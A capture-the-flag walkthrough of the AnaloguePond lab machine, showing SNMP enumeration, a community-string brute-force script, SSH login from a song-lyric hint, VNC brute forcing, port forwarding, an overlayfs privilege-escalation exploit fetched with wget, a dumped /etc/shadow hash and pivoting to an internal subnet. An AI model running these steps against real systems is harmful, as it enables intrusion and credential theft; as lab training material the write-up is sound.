AnaloguePond CTF Walkthrough - DigiP
a guest
Apr 26th, 2017

netdiscover
192.168.1.249 08:00:27:c0:69:94 6 360 PCS Systemtechnik GmbH

nmap -sC -sV -T5 --open -v -p- --script vuln 192.168.1.249

Discovered open port 22/tcp on 192.168.1.249
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)

#hosts file
127.0.0.1 analoguepond


us -mU -Iv analoguepond:a -r 1000
UDP open domain[ 53] from 208.67.222.222 ttl 56
UDP open snmp[ 161] from 192.168.1.249 ttl 64


EXTRABACON

snmp-check -c public -v 2c 192.168.1.249

snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)

[+] Try to connect to 192.168.1.249:161 using SNMPv2c and community 'public'

[*] System information:

Host IP address : 192.168.1.249
Hostname : analoguepond
Description : Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64
Contact : Eric Burdon <eric@example.com>
Location : There is a house in New Orleans they call it...
Uptime snmp : 00:47:17.27
Uptime system : 00:47:06.45
System date : 2017-4-26 02:05:41.0

[*] Network information:

Default TTL : noSuchObject
TCP segments received : noSuchObject
TCP segments sent : noSuchObject
TCP segments retrans : noSuchObject
Input datagrams : noSuchObject
Delivered datagrams : noSuchObject
Output datagrams : noSuchObject

[*] File system information:

Index : noSuchObject
Mount point : noSuchObject
Access : noSuchObject
Bootable : noSuchObject


onesixtyone 192.168.1.249
Scanning 1 hosts, 2 communities
192.168.1.249 [public] Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64
192.168.1.249 [public] Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64

Couldn't get onesixtyone to read multiple community strings from a file, so I made my own little script.

#!/bin/bash
# usage: bash snmp-brute.sh <target IP>   e.g. 192.168.1.249
# runs snmp-check once per community string in the wordlist against the target
target="$1"
while read -r community
do
    snmp-check -c "$community" -v 2c -w "$target"
    sleep 3
done < /mnt/HDD2/wordlists/communitystrings.txt

bash snmp-brute.sh 192.168.1.249
The only one found was public (but that depends on your list and what is on the server).


snmpwalk -v 2c -c public 192.168.1.249
iso.3.6.1.2.1.1.1.0 = STRING: "Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (622728) 1:43:47.28
iso.3.6.1.2.1.1.4.0 = STRING: "Eric Burdon <eric@example.com>"
iso.3.6.1.2.1.1.5.0 = STRING: "analoguepond"
iso.3.6.1.2.1.1.6.0 = STRING: "There is a house in New Orleans they call it..."
iso.3.6.1.2.1.1.7.0 = INTEGER: 72
iso.3.6.1.2.1.1.8.0 = Timeticks: (1) 0:00:00.01
iso.3.6.1.2.1.1.9.1.2.1 = OID: iso.3.6.1.6.3.11.3.1.1
iso.3.6.1.2.1.1.9.1.2.2 = OID: iso.3.6.1.6.3.15.2.1.1
iso.3.6.1.2.1.1.9.1.2.3 = OID: iso.3.6.1.6.3.10.3.1.1
iso.3.6.1.2.1.1.9.1.2.4 = OID: iso.3.6.1.6.3.1
iso.3.6.1.2.1.1.9.1.2.5 = OID: iso.3.6.1.2.1.49
iso.3.6.1.2.1.1.9.1.2.6 = OID: iso.3.6.1.2.1.4
iso.3.6.1.2.1.1.9.1.2.7 = OID: iso.3.6.1.2.1.50
iso.3.6.1.2.1.1.9.1.2.8 = OID: iso.3.6.1.6.3.16.2.2.1
iso.3.6.1.2.1.1.9.1.2.9 = OID: iso.3.6.1.6.3.13.3.1.3
iso.3.6.1.2.1.1.9.1.2.10 = OID: iso.3.6.1.2.1.92
iso.3.6.1.2.1.1.9.1.3.1 = STRING: "The MIB for Message Processing and Dispatching."
iso.3.6.1.2.1.1.9.1.3.2 = STRING: "The management information definitions for the SNMP User-based Security Model."
iso.3.6.1.2.1.1.9.1.3.3 = STRING: "The SNMP Management Architecture MIB."
iso.3.6.1.2.1.1.9.1.3.4 = STRING: "The MIB module for SNMPv2 entities"
iso.3.6.1.2.1.1.9.1.3.5 = STRING: "The MIB module for managing TCP implementations"
iso.3.6.1.2.1.1.9.1.3.6 = STRING: "The MIB module for managing IP and ICMP implementations"
iso.3.6.1.2.1.1.9.1.3.7 = STRING: "The MIB module for managing UDP implementations"
iso.3.6.1.2.1.1.9.1.3.8 = STRING: "View-based Access Control Model for SNMP."
iso.3.6.1.2.1.1.9.1.3.9 = STRING: "The MIB modules for managing SNMP Notification, plus filtering."
iso.3.6.1.2.1.1.9.1.3.10 = STRING: "The MIB module for logging SNMP Notifications."
iso.3.6.1.2.1.1.9.1.4.1 = Timeticks: (1) 0:00:00.01
iso.3.6.1.2.1.1.9.1.4.2 = Timeticks: (1) 0:00:00.01
iso.3.6.1.2.1.1.9.1.4.3 = Timeticks: (1) 0:00:00.01
iso.3.6.1.2.1.1.9.1.4.4 = Timeticks: (1) 0:00:00.01
iso.3.6.1.2.1.1.9.1.4.5 = Timeticks: (1) 0:00:00.01
iso.3.6.1.2.1.1.9.1.4.6 = Timeticks: (1) 0:00:00.01
iso.3.6.1.2.1.1.9.1.4.7 = Timeticks: (1) 0:00:00.01
iso.3.6.1.2.1.1.9.1.4.8 = Timeticks: (1) 0:00:00.01
iso.3.6.1.2.1.1.9.1.4.9 = Timeticks: (1) 0:00:00.01
iso.3.6.1.2.1.1.9.1.4.10 = Timeticks: (1) 0:00:00.01
iso.3.6.1.2.1.25.1.1.0 = Timeticks: (623811) 1:43:58.11
iso.3.6.1.2.1.25.1.2.0 = Hex-STRING: 07 E1 04 1A 03 02 16 00 2B 01 00
iso.3.6.1.2.1.25.1.3.0 = INTEGER: 393216
iso.3.6.1.2.1.25.1.4.0 = STRING: "BOOT_IMAGE=/vmlinuz-3.19.0-25-generic root=/dev/mapper/analoguepond--vg-root ro
"
iso.3.6.1.2.1.25.1.5.0 = Gauge32: 0
iso.3.6.1.2.1.25.1.6.0 = Gauge32: 48
iso.3.6.1.2.1.25.1.7.0 = INTEGER: 0
iso.3.6.1.2.1.25.1.7.0 = No more variables left in this MIB View (It is past the end of the MIB tree)

Location : There is a house in New Orleans they call it...
The SNMP location string is the hint: the song continues "...the Rising Sun", so we try that as eric's password.
sshpass -f <(printf '%s\n' therisingsun) ssh eric@analoguepond

Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 3.19.0-25-generic x86_64)

* Documentation: https://help.ubuntu.com/

System information as of Wed Apr 26 03:06:56 BST 2017

System load: 0.04 Processes: 81
Usage of /: 82.3% of 5.39GB Users logged in: 0
Memory usage: 35% IP address for eth0: 192.168.1.249
Swap usage: 0% IP address for virbr0: 192.168.122.1

Graph this data and manage this system at:
https://landscape.canonical.com/
New release '16.04.2 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

eric@analoguepond:~$

eric@analoguepond:~$ cat /etc/*ele* /etc/issue;uname -a
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION="Ubuntu 14.04.5 LTS"
NAME="Ubuntu"
VERSION="14.04.5 LTS, Trusty Tahr"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 14.04.5 LTS"
VERSION_ID="14.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
Ubuntu 14.04.5 LTS

My IP: 192.168.1.249

Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
eric@analoguepond:~$
eric@analoguepond:~$ ls -lashR
.:
total 68K
4.0K drwxr-xr-x 4 eric eric 4.0K Jan 7 18:33 .
4.0K drwxr-xr-x 3 root root 4.0K Dec 13 21:11 ..
4.0K -rw------- 1 eric eric 47 Apr 26 03:07 .bash_history
4.0K -rw-r--r-- 1 eric eric 220 Dec 13 21:11 .bash_logout
4.0K -rw-r--r-- 1 eric eric 3.6K Dec 13 21:11 .bashrc
4.0K drwx------ 2 eric eric 4.0K Jan 7 18:32 .cache
4.0K drwx------ 3 eric eric 4.0K Dec 14 21:26 .dbus
4.0K -rw-r--r-- 1 eric eric 675 Dec 13 21:11 .profile
32K -rw-rw-r-- 1 eric eric 29K Dec 18 15:44 reticulatingsplines.gif
4.0K -rw------- 1 eric eric 711 Jan 7 18:32 .viminfo

./.cache:
total 8.0K
4.0K drwx------ 2 eric eric 4.0K Jan 7 18:32 .
4.0K drwxr-xr-x 4 eric eric 4.0K Jan 7 18:33 ..
0 -rw-r--r-- 1 eric eric 0 Jan 7 18:32 motd.legal-displayed

./.dbus:
total 12K
4.0K drwx------ 3 eric eric 4.0K Dec 14 21:26 .
4.0K drwxr-xr-x 4 eric eric 4.0K Jan 7 18:33 ..
4.0K drwx------ 2 eric eric 4.0K Dec 18 16:21 session-bus

./.dbus/session-bus:
total 16K
4.0K drwx------ 2 eric eric 4.0K Dec 18 16:21 .
4.0K drwx------ 3 eric eric 4.0K Dec 14 21:26 ..
4.0K -rw-rw-r-- 1 eric eric 476 Jan 7 16:44 1e9afac86f8648627311d32c585063c8-10
4.0K -rw-rw-r-- 1 eric eric 476 Dec 22 20:40 1e9afac86f8648627311d32c585063c8-11
eric@analoguepond:~$

eric@analoguepond:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:107::/var/run/dbus:/bin/false
dnsmasq:x:103:65534:dnsmasq,,,:/var/lib/misc:/bin/false
landscape:x:104:110::/var/lib/landscape:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
libvirt-qemu:x:106:106:Libvirt Qemu,,,:/var/lib/libvirt:/bin/false
libvirt-dnsmasq:x:107:111:Libvirt Dnsmasq,,,:/var/lib/libvirt/dnsmasq:/bin/false
eric:x:1000:1000:Eric Burdon,,,:/home/eric:/bin/bash
colord:x:108:115:colord colour management daemon,,,:/var/lib/colord:/bin/false
snmp:x:109:116::/var/lib/snmp:/bin/false
snmptt:x:110:117:SNMP Trap Translator,,,:/var/spool/snmptt:/bin/false

eric@analoguepond:~$ cat /etc/group
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:syslog,eric
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:eric
floppy:x:25:
tape:x:26:
sudo:x:27:
audio:x:29:
dip:x:30:eric
www-data:x:33:
backup:x:34:
operator:x:37:
list:x:38:
irc:x:39:
src:x:40:
gnats:x:41:
shadow:x:42:
utmp:x:43:
video:x:44:
sasl:x:45:
plugdev:x:46:eric
staff:x:50:
games:x:60:
users:x:100:
nogroup:x:65534:
libuuid:x:101:
netdev:x:102:
crontab:x:103:
syslog:x:104:
fuse:x:105:
kvm:x:106:
messagebus:x:107:
mlocate:x:108:
ssh:x:109:
landscape:x:110:
libvirtd:x:111:eric
eric:x:1000:
lpadmin:x:112:eric
sambashare:x:113:eric
scanner:x:114:
colord:x:115:
snmp:x:116:
snmptt:x:117:

eric@analoguepond:/var/log$ netstat -antplu
(No info could be read for "-p": geteuid()=1000 but you should be root.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 192.168.122.1:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:5900 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:5901 0.0.0.0:* LISTEN -
tcp 0 36 192.168.1.249:22 192.168.1.66:52778 ESTABLISHED -
tcp6 0 0 :::22 :::* LISTEN -
udp 0 0 0.0.0.0:42984 0.0.0.0:* -
udp 0 0 192.168.122.1:53 0.0.0.0:* -
udp 0 0 0.0.0.0:67 0.0.0.0:* -
udp 0 0 0.0.0.0:68 0.0.0.0:* -
udp 6336 0 0.0.0.0:41040 0.0.0.0:* -
udp 0 0 0.0.0.0:161 0.0.0.0:* -
udp6 0 0 ::1:161 :::* -
udp6 0 0 :::39304 :::* -
eric@analoguepond:/var/log$

eric@analoguepond:/var/log$ nc -nv 127.0.0.1 5901
Connection to 127.0.0.1 5901 port [tcp/*] succeeded!
RFB 003.008
^C
eric@analoguepond:/var/log$ nc -nv 127.0.0.1 5900
Connection to 127.0.0.1 5900 port [tcp/*] succeeded!
RFB 003.008

ssh -L 5901:127.0.0.1:5901 -N -f -l eric 192.168.1.249
ssh -L 5900:127.0.0.1:5900 -N -f -l eric 192.168.1.249

We set up our forwarders to the remote system. We can now try vncviewer:
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:5900 0.0.0.0:* LISTEN 1405/ssh
tcp 0 0 127.0.0.1:5901 0.0.0.0:* LISTEN 1319/ssh

vncviewer 127.0.0.1:5901
Connected to RFB server, using protocol version 3.8
Performing standard VNC authentication
Password:
Authentication failed

However, we don't yet know the password.
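The two listeners identify themselves with an RFB banner and then tell the client which security types they accept, which is what "Performing standard VNC authentication" above reflects. The parser below is an added example (not part of this walkthrough) of the kind of check an inventory or detection script does to classify VNC listeners offline, e.g. to flag one that offers no authentication; the handshake bytes it is fed are constructed to match the "RFB 003.008" banner seen here.

```python
# Offline parser for the start of an RFB (VNC) handshake, as an inventory or
# detection script would use it to classify a VNC listener from captured bytes.
# Added example; the sample messages below are constructed.
import re
import struct

# Security types from RFC 6143 section 7.1.2 (plus common registered extensions)
SECURITY_TYPES = {
    0: "Invalid", 1: "None", 2: "VNC Authentication",
    5: "RA2", 6: "RA2ne", 16: "Tight", 18: "TLS", 19: "VeNCrypt",
}


def parse_protocol_version(banner: bytes) -> tuple:
    """Return (major, minor) from a 'RFB xxx.yyy' banner; raise if it is not RFB."""
    m = re.fullmatch(rb"RFB (\d{3})\.(\d{3})\n", banner)
    if not m:
        raise ValueError("not an RFB ProtocolVersion banner")
    return int(m.group(1)), int(m.group(2))


def parse_security_types(version: tuple, data: bytes) -> list:
    """Return the security types the server offers after version negotiation.

    3.3: the server sends one big-endian U32 security type.
    3.7/3.8: the server sends a U8 count followed by that many U8 types; a
    count of 0 means the connection failed and a U32 length + reason follows.
    """
    if version < (3, 7):
        (sec_type,) = struct.unpack(">I", data[:4])
        return [sec_type]
    count = data[0]
    if count == 0:
        (rlen,) = struct.unpack(">I", data[1:5])
        reason = data[5:5 + rlen].decode("latin-1", "replace")
        raise ConnectionError(f"server refused connection: {reason}")
    return list(data[1:1 + count])


def classify(banner: bytes, security_msg: bytes) -> dict:
    """Summarise what a listener requires before a client can see the framebuffer."""
    version = parse_protocol_version(banner)
    types = parse_security_types(version, security_msg)
    if 1 in types:
        finding = "no authentication offered"
    elif types == [2]:
        finding = "VNC Authentication (password) only"
    else:
        finding = "other / encrypted security types offered"
    return {
        "version": version,
        "security_types": [SECURITY_TYPES.get(t, f"unknown({t})") for t in types],
        "finding": finding,
    }


# Constructed samples (not captured from the CTF host)
BANNER_3_8 = b"RFB 003.008\n"           # what nc printed for ports 5900 and 5901
SEC_VNC_AUTH = b"\x01\x02"              # one type offered: VNC Authentication
SEC_NONE_OR_VNC = b"\x02\x01\x02"       # None and VNC Authentication both offered
BANNER_3_3 = b"RFB 003.003\n"
SEC_3_3_VNC_AUTH = b"\x00\x00\x00\x02"  # 3.3 style: a single U32

if __name__ == "__main__":
    print(classify(BANNER_3_8, SEC_VNC_AUTH))
    print(classify(BANNER_3_8, SEC_NONE_OR_VNC))
    print(classify(BANNER_3_3, SEC_3_3_VNC_AUTH))
```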

hydra -L /mnt/HDD2/ctf/analouge-pond/risingsun.txt -t vnc 127.0.0.1:5901
won't connect... XD

ssh -f -N -D 7070 eric@192.168.1.249

proxychains nmap -sS -n -PN -p- 127.0.0.1
ProxyChains-3.1 (http://proxychains.sf.net)

Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-25 22:51 EDT
Nmap scan report for 127.0.0.1
Host is up (0.0000040s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE
111/tcp open rpcbind
5900/tcp open vnc
5901/tcp open vnc-1
7070/tcp open realserver

Nmap done: 1 IP address (1 host up) scanned in 0.70 seconds




nmap -sC -sV -T5 --open --script vuln -PN -p- 127.0.0.1

Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-25 22:58 EDT
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for localhost (127.0.0.1)
Host is up (0.0000030s latency).
Not shown: 65531 closed ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
|_ 100000 2,3,4 111/udp rpcbind
5900/tcp open vnc VNC (protocol 3.8)
|_sslv2-drown:
5901/tcp open vnc VNC (protocol 3.8)
|_sslv2-drown:
7070/tcp open realserver?

searchsploit Ubuntu 14.04
Linux Kernel 4.3.3 (Ubuntu 14.04/15.10) - 'overlayfs' Privilege Escalation (1) | linux/local/39166.c
We compile this locally, copy it to /var/www/html and start apache2. On the victim machine, we wget the file, chmod +x, and then run it. We are now root!

root@analoguepond:~# id
uid=0(root) gid=1000(eric) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),111(libvirtd),112(lpadmin),113(sambashare),1000(eric)
root@analoguepond:~#

root@analoguepond:~# cat /etc/shadow
root:!:17148:0:99999:7:::
daemon:*:16652:0:99999:7:::
bin:*:16652:0:99999:7:::
sys:*:16652:0:99999:7:::
sync:*:16652:0:99999:7:::
games:*:16652:0:99999:7:::
man:*:16652:0:99999:7:::
lp:*:16652:0:99999:7:::
mail:*:16652:0:99999:7:::
news:*:16652:0:99999:7:::
uucp:*:16652:0:99999:7:::
proxy:*:16652:0:99999:7:::
www-data:*:16652:0:99999:7:::
backup:*:16652:0:99999:7:::
list:*:16652:0:99999:7:::
irc:*:16652:0:99999:7:::
gnats:*:16652:0:99999:7:::
nobody:*:16652:0:99999:7:::
libuuid:!:16652:0:99999:7:::
syslog:*:16652:0:99999:7:::
messagebus:*:17148:0:99999:7:::
dnsmasq:*:17148:0:99999:7:::
landscape:*:17148:0:99999:7:::
sshd:*:17148:0:99999:7:::
libvirt-qemu:!:17148:0:99999:7:::
libvirt-dnsmasq:!:17148:0:99999:7:::
eric:$6$7RkXSEhf$RhH8uZkqDOnejEuCmrCo0VBEdYKWP050O.ArVW4uGxmf0ovnNbLWqKWL5iB2yT0d0GoDvkb5chjQX79pa.tcy0:17148:0:99999:7:::
colord:*:17149:0:99999:7:::
snmp:*:17152:0:99999:7:::
snmptt:*:17152:0:99999:7:::
root@analoguepond:~#


root, as of now, has no password, so ssh won't help us. We could set one, but it doesn't seem like we're going to need to, since the main task is not to gain root but to complete the list of tasks the op has set up for us on the CTF.

The VNC servers must have passwords stored locally. Hopefully we can find and read them now that we are root, or change them, to complete our tasks.

root@analoguepond:~# cd /root
root@analoguepond:/root# ls -lashR
.:
total 20K
4.0K drwx------ 2 root root 4.0K Jan 7 18:36 .
4.0K drwxr-xr-x 22 root root 4.0K Jan 7 18:42 ..
4.0K -rw-r--r-- 1 root root 3.1K Feb 20 2014 .bashrc
4.0K -rw------- 1 root root 237 Dec 17 09:38 flag.txt
4.0K -rw-r--r-- 1 root root 140 Feb 20 2014 .profile
root@analoguepond:/root# cat flag.txt
C'Mon Man! Y'all didn't think this was the final flag so soon...?

Did the bright lights and big city knock you out...? If you pull
a stunt like this again, I'll send you back to Walker...

This is obviously troll flah #1 So keep going.
root@analoguepond:/root#


The libvirt logs under /var/log/libvirt/qemu show that the two VNC listeners are the consoles of two KVM guests, each started with -vnc 127.0.0.1:N,password:

2017-04-25 20:18:04.650+0000: starting up
LC_ALL=C PATH=/usr/local/sbin:/usr/local/bin:/usr/bin:/usr/sbin:/sbin:/bin QEMU_AUDIO_DRV=none /usr/bin/qemu-system-x86_64 -name barringsbank -S -machine pc-i440fx-trusty,accel=tcg,usb=off -m 1024 -realtime mlock=off -smp 1,sockets=1,cores=1,threads=1 -uuid 6cf27edd-7559-d6eb-1502-d3135c807785 -no-user-config -nodefaults -device sga -chardev socket,id=charmonitor,path=/var/lib/libvirt/qemu/barringsbank.monitor,server,nowait -mon chardev=charmonitor,id=monitor,mode=control -rtc base=utc -no-shutdown -boot order=c,menu=on,strict=on -device piix3-usb-uhci,id=usb,bus=pci.0,addr=0x1.0x2 -drive file=/var/lib/libvirt/images/barringsbank-1.img,if=none,id=drive-ide0-0-1,format=qcow2 -device ide-hd,bus=ide.0,unit=1,drive=drive-ide0-0-1,id=ide0-0-1 -netdev tap,fd=23,id=hostnet0 -device rtl8139,netdev=hostnet0,id=net0,mac=52:54:00:6d:93:6a,bus=pci.0,addr=0x3 -chardev pty,id=charserial0 -device isa-serial,chardev=charserial0,id=serial0 -vnc 127.0.0.1:0,password -device cirrus-vga,id=video0,bus=pci.0,addr=0x2 -device virtio-balloon-pci,id=balloon0,bus=pci.0,addr=0x5
char device redirected to /dev/pts/0 (label charserial0)
/var/log/libvirt/qemu/barringsbank.log (END)


2017-04-25 20:18:05.470+0000: starting up
LC_ALL=C PATH=/usr/local/sbin:/usr/local/bin:/usr/bin:/usr/sbin:/sbin:/bin QEMU_AUDIO_DRV=none /usr/bin/qemu-system-x86_64 -name puppet -S -machine pc-i440fx-trusty,accel=tcg,usb=off -m 1024 -realtime mlock=off -smp 1,sockets=1,cores=1,threads=1 -uuid 3561f84c-71c3-f16f-4a7b-9097e7d2ac39 -no-user-config -nodefaults -device sga -chardev socket,id=charmonitor,path=/var/lib/libvirt/qemu/puppet.monitor,server,nowait -mon chardev=charmonitor,id=monitor,mode=control -rtc base=utc -no-shutdown -boot order=dc,menu=on,strict=on -device piix3-usb-uhci,id=usb,bus=pci.0,addr=0x1.0x2 -drive file=/var/lib/libvirt/images/puppet-1.img,if=none,id=drive-ide0-0-1,format=qcow2 -device ide-hd,bus=ide.0,unit=1,drive=drive-ide0-0-1,id=ide0-0-1 -netdev tap,fd=23,id=hostnet0 -device virtio-net-pci,netdev=hostnet0,id=net0,mac=52:54:00:5b:05:f7,bus=pci.0,addr=0x3 -chardev pty,id=charserial0 -device isa-serial,chardev=charserial0,id=serial0 -vnc 127.0.0.1:1,password -device cirrus-vga,id=video0,bus=pci.0,addr=0x2 -device virtio-balloon-pci,id=balloon0,bus=pci.0,addr=0x4
char device redirected to /dev/pts/6 (label charserial0)

root@analoguepond:/var/run# ifconfig
eth0 Link encap:Ethernet HWaddr 08:00:27:c0:69:94
inet addr:192.168.1.249 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:fec0:6994/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:604576 errors:0 dropped:0 overruns:0 frame:0
TX packets:436808 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:45181046 (45.1 MB) TX bytes:34323377 (34.3 MB)

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:7669 errors:0 dropped:0 overruns:0 frame:0
TX packets:7669 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:376210 (376.2 KB) TX bytes:376210 (376.2 KB)

virbr0 Link encap:Ethernet HWaddr 52:54:00:b2:23:25
inet addr:192.168.122.1 Bcast:192.168.122.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:812 errors:0 dropped:0 overruns:0 frame:0
TX packets:796 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:47884 (47.8 KB) TX bytes:70860 (70.8 KB)

vnet0 Link encap:Ethernet HWaddr fe:54:00:6d:93:6a
inet6 addr: fe80::fc54:ff:fe6d:936a/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:2813 errors:0 dropped:0 overruns:0 frame:0
TX packets:9567 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:500
RX bytes:1376378 (1.3 MB) TX bytes:1621185 (1.6 MB)

vnet1 Link encap:Ethernet HWaddr fe:54:00:5b:05:f7
inet6 addr: fe80::fc54:ff:fe5b:5f7/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:2845 errors:0 dropped:0 overruns:0 frame:0
TX packets:10528 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:500
RX bytes:1270004 (1.2 MB) TX bytes:1795087 (1.7 MB)

root@analoguepond:/var/run# ip link
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP mode DEFAULT group default qlen 1000
link/ether 08:00:27:c0:69:94 brd ff:ff:ff:ff:ff:ff
3: virbr0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP mode DEFAULT group default
link/ether 52:54:00:b2:23:25 brd ff:ff:ff:ff:ff:ff
4: virbr0-nic: <BROADCAST,MULTICAST> mtu 1500 qdisc pfifo_fast master virbr0 state DOWN mode DEFAULT group default qlen 500
link/ether 52:54:00:b2:23:25 brd ff:ff:ff:ff:ff:ff
5: vnet0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast master virbr0 state UNKNOWN mode DEFAULT group default qlen 500
link/ether fe:54:00:6d:93:6a brd ff:ff:ff:ff:ff:ff
6: vnet1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast master virbr0 state UNKNOWN mode DEFAULT group default qlen 500
link/ether fe:54:00:5b:05:f7 brd ff:ff:ff:ff:ff:ff


root@analoguepond:/var/run# iptables
iptables v1.4.21: no command specified
Try `iptables -h' or 'iptables --help' for more information.
root@analoguepond:/var/run# iptables --list
Chain INPUT (policy ACCEPT)
target prot opt source destination
ACCEPT udp -- anywhere anywhere udp dpt:domain
ACCEPT tcp -- anywhere anywhere tcp dpt:domain
ACCEPT udp -- anywhere anywhere udp dpt:bootps
ACCEPT tcp -- anywhere anywhere tcp dpt:bootps

Chain FORWARD (policy ACCEPT)
target prot opt source destination
ACCEPT all -- anywhere 192.168.122.0/24 ctstate RELATED,ESTABLISHED
ACCEPT all -- 192.168.122.0/24 anywhere
ACCEPT all -- anywhere anywhere
REJECT all -- anywhere anywhere reject-with icmp-port-unreachable
REJECT all -- anywhere anywhere reject-with icmp-port-unreachable

Chain OUTPUT (policy ACCEPT)
target prot opt source destination
ACCEPT udp -- anywhere anywhere udp dpt:bootpc

So there is another subnet, 192.168.122.0/24. We check for nodes on the subnet.
root@analoguepond:/var/run# nmap -sN 192.168.122.0/24


Nmap scan report for puppet.example.com (192.168.122.2)
PORT STATE SERVICE
22/tcp open|filtered ssh
MAC Address: 52:54:00:5B:05:F7 (QEMU Virtual NIC)

Nmap scan report for barringsbank.example.com (192.168.122.3)
PORT STATE SERVICE
22/tcp open|filtered ssh
MAC Address: 52:54:00:6D:93:6A (QEMU Virtual NIC)

ssh eric@192.168.122.2
The authenticity of host '192.168.122.2 (192.168.122.2)' can't be established.
ECDSA key fingerprint is 4e:e6:d6:38:8a:9b:3c:aa:0c:55:95:a6:57:ce:f9:e5.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.122.2' (ECDSA) to the list of known hosts.
+-----------------------------------------------------------------------------+
| Passwords are very dated.. Removing spaces helps sandieshaw log in with her |
| most famous song |
+-----------------------------------------------------------------------------+
eric@192.168.122.2's password:
Is the user now "sandieshaw"?
We try: puppetonastring

ssh sandieshaw@192.168.122.2's password:

Welcome to Ubuntu 14.04.3 LTS (GNU/Linux 4.4.0-57-generic x86_64)

* Documentation: https://help.ubuntu.com/

